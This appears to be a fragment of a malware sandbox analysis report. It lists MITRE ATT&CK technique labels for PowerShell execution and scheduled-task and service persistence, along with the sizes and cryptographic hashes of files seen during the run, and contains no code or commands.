PID:3248
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5ac3bf9756600f6c31a15240716e6e7c6
SHA1521aa76b55f74cafd1b579933dc0fae439acb0f5
SHA256f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd
SHA51296ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
153B
MD55d0ccb0bb6544cdf3f0c13840e4fa937
SHA17474078d72554fe1ce3ba0515d1b2a38bada077b
SHA25686aa989216d75b017d4aa5227121ce6afaee19ce0848f0189b717cca562cb741
SHA512f93ce3fca022cf1d553d28c35aaf10c95988e2b404f99f4aa26ca205148179cc7cfa65b0a221e9a5b1ac7d54826bfcb5d0d3da67afca281a90cefd280c8e1f6b
-
Filesize
21KB
MD5437d33082fd10193adc7055cc7f2e307
SHA1d9c760d8bcc3aa5a5ee0523fa1481c178c83632a
SHA256f2701ecd6376ea963c6a207f941731e0c01a14f90a2e43867d9db1be477be0a8
SHA512c14ee5e73e463e191e4bc1b1bdbcb334167a8bce028cfe72a59f5db55c1b20003edd1c313a847478b8027e1a3f73419496dd290fe84064e41d150ab628ba9284
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
74KB
MD5a1e76f2fbe7af658b38383fbfd7cfff4
SHA16dc43ef73b59ff29089a4b29bc8ade4ea63484ec
SHA2567782da3a91f91377c4c8d1d338237c6ff996ad42caaab27c1cdc5ea7e90058e1
SHA5124a47391ba3132cfb36da8d7f08ae6856312b26547845e3fe5f3ddd0939893245bf4de337671bc917926d5c764a6100d084845236ef1707560ff5be4aa5f2bed8